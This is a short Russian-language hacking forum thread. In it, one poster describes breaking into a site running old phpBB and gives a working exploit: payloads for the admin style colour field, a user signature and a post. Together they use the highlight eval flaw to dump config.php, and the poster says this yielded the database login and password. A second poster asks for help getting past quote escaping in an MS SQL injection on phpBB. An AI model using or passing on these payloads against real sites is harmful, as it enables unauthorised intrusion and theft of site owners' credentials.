Может кому пригодится . Давно ломал сайт , там стоял старый phpbb . Через базу не смог проделать инклуд. И все остальные способы не помогли. И вот нарыл такой способ. Идем Administration Panel --> Styles Admin --> Management --> subSilver --> Edit Затем находим "Font Colour 3" и вместо 6цифр_цвета: Code: "'./*" Далее идем в админский профайл или любой другой юзерский и в поле подписи Signature вставляем: Code: "$fd=fopen($phpbb_root_path.'config.php','rb');while(!feof($fd)){echo htmlspecialchars(fgets($fd));}" Сохраняем! После этого создаем в любом топике сообщение с текстом: Code: "*/var_dump(eval($user_sig)).flush().die().'" Ну и всем известный способ --- допишем к топику &highlight=1 ---в моем случае я получил пасс и логин от базы.
Всем привет. Я извиняюсь что не в тему , просто не хотел создавать лишний раз тему. Нашел на phpBB MS SQL-injection.Могу провести несколько запросов где не исползуються знаки ( '," ) , всегда когда вставлю этот знак ,фильтр перед ним встявляет ( \ ),итоге Incorrect syntax near '\'. Ничего не смог придумать , может вы знаете какие-нибудь решение ? СПС.
